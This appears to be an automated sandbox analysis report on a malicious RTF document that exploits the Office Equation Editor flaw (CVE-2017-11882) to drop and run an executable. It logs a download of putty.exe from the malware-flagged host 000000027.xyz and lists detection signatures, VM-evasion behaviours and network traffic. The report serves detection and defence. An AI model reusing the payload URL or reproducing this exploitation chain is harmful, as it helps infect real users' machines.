Loading ...

Play interactive tourEdit tour

Analysis Report 7bYDInO.rtf

Overview

General Information

Sample Name:7bYDInO.rtf
Analysis ID:412279
MD5:847b071fa537e21507e78c80b5aa7d59
SHA1:9455119a6522727905dd14ee3b29e87f55e88a26
SHA256:a60f4a353ea89adc8def453c8a1e65ea2ecc46c64d0d9ea375ca4e85e1c428fd
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found iframes
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 660 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2276 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • 9697.exe (PID: 2592 cmdline: C:\Users\user\AppData\Roaming\9697.exe MD5: AA2AD37BB74C05A49417E3D2F1BD89CE)
      • SetupHost.exe (PID: 2608 cmdline: 'C:\$Windows.~WS\Sources\SetupHost.Exe' /Download /Web MD5: A5D94F9587F97E9C674447447721B77F)
  • vdsldr.exe (PID: 2768 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: 5225207BDE8C090CE92A18C61180650C)
  • iexplore.exe (PID: 2472 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://go.microsoft.com/fwlink/?LinkId=530045 MD5: 4EB098135821348270F27157F7A84E65)
    • iexplore.exe (PID: 2904 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2472 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

Exploits:

barindex
Sigma detected: EQNEDT32.EXE connecting to internetShow sources
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 194.58.112.173, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2276, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXEShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2276, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MediaCreationTool20H2[1].exe

System Summary:

barindex
Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\9697.exe, CommandLine: C:\Users\user\AppData\Roaming\9697.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\9697.exe, NewProcessName: C:\Users\user\AppData\Roaming\9697.exe, OriginalFileName: C:\Users\user\AppData\Roaming\9697.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2276, ProcessCommandLine: C:\Users\user\AppData\Roaming\9697.exe, ProcessId: 2592

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://000000027.xyz/putty.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: 7bYDInO.rtfVirustotal: Detection: 21%Perma Link
Source: 7bYDInO.rtfMetadefender: Detection: 29%Perma Link
Source: 7bYDInO.rtfReversingLabs: Detection: 38%
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009EC0E8 __allrem,SetLastError,BCryptHashData,GetLastError,SetLastError,5_2_009EC0E8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DC3BE BCryptFinishHash,BCryptDestroyHash,LocalFree,5_2_009DC3BE
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DC3FB BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,5_2_009DC3FB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DC4D7 BCryptCreateHash,5_2_009DC4D7
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DC464 BCryptGetProperty,LocalAlloc,5_2_009DC464
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009E8A9A GetFileSizeEx,GetLastError,GetLastError,GetLastError,GetLastError,BCryptHashData,memcpy,GetLastError,GetLastError,BCryptDestroyHash,LocalFree,5_2_009E8A9A

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\9697.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\9697.exeJump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Iframe src: /en-us/authentication/silentsignin?ru=https%3A%2F%2Fsupport.microsoft.com%2Fen-us%2Fsilentsigninhandler
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Iframe src: /en-us/authentication/silentsignin?ru=https%3A%2F%2Fsupport.microsoft.com%2Fen-us%2Fsilentsigninhandler
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Title: Upgrade to Windows 10: FAQ does not match URL
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: Title: Upgrade to Windows 10: FAQ does not match URL
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No <meta name="author".. found
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No <meta name="author".. found
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No <meta name="copyright".. found
Source: https://support.microsoft.com/en-us/windows/upgrade-to-windows-10-faq-cce52341-7943-594e-72ce-e1cf00382445HTTP Parser: No <meta name="copyright".. found
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setuperr.logJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setupact.logJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setuperr.logJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setupact.logJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\Eula.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 152.199.21.175:443 -> 192.168.2.22:49287 version: TLS 1.2
Source: unknownHTTPS traffic detected: 152.199.21.175:443 -> 192.168.2.22:49288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.252.156.174:443 -> 192.168.2.22:49344 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.60.216.6:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.60.216.6:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.210.171.182:443 -> 192.168.2.22:49351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.102:443 -> 192.168.2.22:49356 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.102:443 -> 192.168.2.22:49355 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.60.216.19:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.60.216.19:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.66:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.66:443 -> 192.168.2.22:49361 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.251.174.164:443 -> 192.168.2.22:49364 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.251.174.164:443 -> 192.168.2.22:49363 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.45.173.110:443 -> 192.168.2.22:49365 version: TLS 1.2
Source: Binary string: SetupPrep.pdbGCTL source: 9697.exe, 00000004.00000000.2102966860.0000000001311000.00000020.00020000.sdmp
Source: Binary string: SetupHost.pdbGCTL source: SetupHost.exe, 00000005.00000000.2112960052.000000000099C000.00000020.00020000.sdmp
Source: Binary string: SetupHost.pdb source: SetupHost.exe
Source: Binary string: SetupPrep.pdb source: 9697.exe
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BFD75 memset,SetLastError,GetLastError,FindFirstFileW,memset,wcsrchr,SetLastError,SetLastError,CompareStringW,CompareStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,memset,FindNextFileW,GetLastError,GetLastError,GetLastError,FindClose,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SetLastError,SetLastError,5_2_009BFD75
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A04EA0 FindFirstFileW,5_2_00A04EA0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A04D90 GetLogicalDriveStringsW,5_2_00A04D90

Networking:

barindex
Performs DNS queries to domains with low reputationShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDNS query: 000000027.xyz
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDNS query: 000000027.xyz
Source: unknownNetwork traffic detected: DNS query count 34
Source: Joe Sandbox ViewIP Address: 104.16.18.94 104.16.18.94
Source: Joe Sandbox ViewIP Address: 104.16.18.94 104.16.18.94
Source: Joe Sandbox ViewIP Address: 192.229.221.185 192.229.221.185
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78454E9B-DE8E-4300-98F0-AE5841A8170E}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 000000027.xyzConnection: Keep-Alive
Source: 9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: 000000027.xyz
Source: 9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: SetupHost.exe, 00000005.00000002.3353871006.00000000005BC000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: SetupHost.exe, 00000005.00000002.3353812444.0000000000586000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: 65-478888[1].css.8.drString found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1LLAb
Source: 9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: 9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: 9697.exe, 00000004.00000002.3354355740.0000000000DE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: 9697.exe, 00000004.00000002.3354355740.0000000000DE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: SetupHost.exe, 00000005.00000002.3353812444.0000000000586000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: SetupHost.exe, 00000005.00000002.3353871006.00000000005BC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: SetupHost.exe, 00000005.00000002.3353812444.0000000000586000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: SetupHost.exe, 00000005.00000002.3353812444.0000000000586000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: contentPop2[1].js.8.drString found in binary or memory: http://schema.org/ItemList
Source: contentPop2[1].js.8.drString found in binary or memory: http://schema.org/Product
Source: 9697.exe, 00000004.00000002.3357212824.00000000034F0000.00000002.00000001.sdmp, vdsldr.exe, 00000006.00000002.2130138328.0000000001AD0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 9697.exe, 00000004.00000002.3354355740.0000000000DE7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: 9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
Source: 9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: 9697.exe, 00000004.00000002.3354355740.0000000000DE7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 9697.exe, 00000004.00000002.3357212824.00000000034F0000.00000002.00000001.sdmp, vdsldr.exe, 00000006.00000002.2130138328.0000000001AD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: smc-hero[1].jpg.8.drString found in binary or memory: http://www.eci.org/eci/en/eciRGB.php
Source: smc-hero[1].jpg.8.drString found in binary or memory: http://www.eci.org/eci/en/eciRGB.phpdesc
Source: 9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: 9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: 9697.exe, 00000004.00000002.3354355740.0000000000DE7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: 9697.exe, 00000004.00000002.3353625718.0000000000820000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
Source: 9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: 9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: RC634e263982fb4aa0a4ce1c92868d1637-source.min[1].js.8.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RC634e263982fb4aa0a4ce1c92868d163
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/28/26/282607ec-d5e8-45e1-9c87-09eb3bb73d45.mp4?n=333099_Small-To
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/2a/b6/2ab6377c-a97b-4f5d-bfa6-3e972a1e3c5e.jpg?n=Grounded_HP-FAT
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/34/73/347373fa-2a03-4843-bbe7-7ba715caf03f.mp4?n=333099_Small-To
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/3a/41/3a4199da-4f90-4701-9804-37073bd8c2ee.mp4?n=Grounded_HP-FAT
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/47/f4/47f472b0-4876-40d9-bcd8-319ec81c6bf6.gif?n=Grounded_GLP-Ci
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/54/4b/544b1e21-13d1-4eb8-9743-f9a7e7278724.mp4?n=Grounded-HP-FAT
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/55/7e/557e0080-24d9-4594-b39e-569d5ad673f8.mp4?n=Grounded_HP-FAT
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/61/27/6127707e-15f9-43b1-b2f4-67069007436f.mp4?n=333099_Large-To
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/6c/31/6c31e508-ddd9-40bd-91d4-cc362b1b15bc.gif?n=Grounded_GLP-Ci
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/7b/30/7b30e02e-472a-46a6-b0fe-76a971dcec19.gif?n=Grounded_GLP-Ci
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/88/54/88549de9-e881-40bf-b4ec-17f176b8b4cf.mp4?n=333099_Small-To
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/95/75/95759052-cc36-4137-8742-d5abbc0015db.mp4?n=333099_Large-To
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/b3/de/b3de4dd6-6ee2-462e-9105-459263f21861.mp4?n=Grounded_HP-FAT
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/ca/fa/cafaa794-a881-4e12-ab76-86a8b1e2174b.gif?n=Grounded_GLP-Ci
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/d1/c9/d1c92d75-ede2-4369-93eb-6ab04a12050f.mp4?n=333099_Small-To
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/db/5c/db5c1b59-2652-4210-81c9-73ff3b80802d.png?n=playbutton.png
Source: contentPop2[1].js.8.drString found in binary or memory: https://compass-ssl.xbox.com/assets/f9/9c/f99c3934-6bf4-4833-ab24-677fb83cb882.mp4?n=Grounded-HP-FAT
Source: contentPop2[1].js.8.drString found in binary or memory: https://github.com/w3c/IntersectionObserver/issues/211
Source: contentPop2[1].js.8.drString found in binary or memory: https://github.com/w3c/IntersectionObserver/issues/324
Source: contentPop2[1].js.8.drString found in binary or memory: https://github.com/w3c/IntersectionObserver/pull/205
Source: SetupHost.exe, 00000005.00000002.3353892513.00000000005D9000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: contentPop2[1].js.8.drString found in binary or memory: https://w3c.github.io/IntersectionObserver/#calculate-intersection-rect-algo
Source: contentPop2[1].js.8.drString found in binary or memory: https://w3c.github.io/IntersectionObserver/#intersection-observer-entry
Source: contentPop2[1].js.8.drString found in binary or memory: https://w3c.github.io/IntersectionObserver/#intersection-observer-interface
Source: unknownNetwork traffic detected: HTTP traffic on port 49351 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49346
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49268
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49345
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49267
Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49344
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 49370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49381
Source: unknownNetwork traffic detected: HTTP traffic on port 49378 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49380
Source: unknownNetwork traffic detected: HTTP traffic on port 49355 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49369 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49361 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49346 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49380 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49378
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49377
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49376
Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49375
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49374
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49373
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49372
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49371
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49370
Source: unknownNetwork traffic detected: HTTP traffic on port 49358 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49371 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49364 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49381 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49369
Source: unknownNetwork traffic detected: HTTP traffic on port 49376 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49366
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49365
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49287
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49364
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49363
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49362
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49361
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49372 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49357 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49363 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49311 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49344 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49358
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49357
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49312
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49356
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49311
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49355
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49351
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49356 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49373 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49345 -> 443
